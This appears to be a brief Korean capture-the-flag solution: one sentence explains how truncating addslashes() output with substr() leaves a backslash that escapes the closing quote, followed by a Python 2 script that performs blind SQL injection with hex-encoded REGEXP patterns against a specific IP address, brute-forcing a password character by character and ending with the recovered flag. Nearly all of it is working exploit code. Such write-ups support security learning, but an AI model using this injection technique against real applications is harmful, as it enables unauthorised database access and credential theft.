addslashes() 뒤에 substr()로 문자열 길이를 자를 때 나타날 수 있는 취약점 (이스케이프용 백슬래시만 끝에 남아 닫는 따옴표를 이스케이프함) + REGEXP를 활용한 blind SQL injection.
#!/usr/bin/python # http://58.229.183.25/eaf1c3a149e8c0dc599159c174655c2b/index.php?id=012345678901234567890123456789012345678\&pw=or(id+REGEXP+0x5E41)--+ import httplib, urllib import time def print_hex1(instr): convstr = "0x"; for ch in instr: convstr += (hex(ord(ch))[2:4]) return convstr def print_dec1(instr): convstr = "char("; for i,ch in enumerate(instr): convstr += "%d" % ord(ch); if (len(instr)-1 != i) : convstr += ", "; convstr += ')'; return convstr headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain" } found = "^00c58a5ba17dafc6a67c88a88cff4f98" for idx in range(1,44) : #for i in "abcdef1234567890" : for i in '''qazwsxedcrfvtgbyhnujmikolpQAZWSXEDCRFVTGBYHNUJMIKOLP0123456789~!@#$%^&*()_+}{|":<>?/.,;'[]\=-`''' : #blind = "id=012345678901234567890123456789012345678\&pw=or(pw+REGEXP+%s)--+" % (print_hex1("^"+found+i)) blind = "id=012345678901234567890123456789012345678\&pw=or(pw+REGEXP+%s)--+" % (print_hex1(found[-4:]+i)) params = "" #print found #print found[-4:] #time.sleep(1) #params = urllib.urlencode({"pw":"", "id":"", "no":blind}) conn = httplib.HTTPConnection("58.229.183.25") #conn.set_debuglevel(10) print blind rq = "/eaf1c3a149e8c0dc599159c174655c2b/index.php?%s" % blind #print rq b = time.time() conn.request("GET", rq, params, headers) response = conn.getresponse() print response.status, response.reason #print rq data = response.read() #print data if data.find("Wrong") > 0 : found += i print found conn.close() break conn.close() print idx, found time.sleep(1) print found # 5e7a6f6d626965242424 = ^zombie$$$ # 5e303063353861356261 = ^00c58a5ba # password is ChA1N3D_EXPLOIT_IS_EVERYWHERE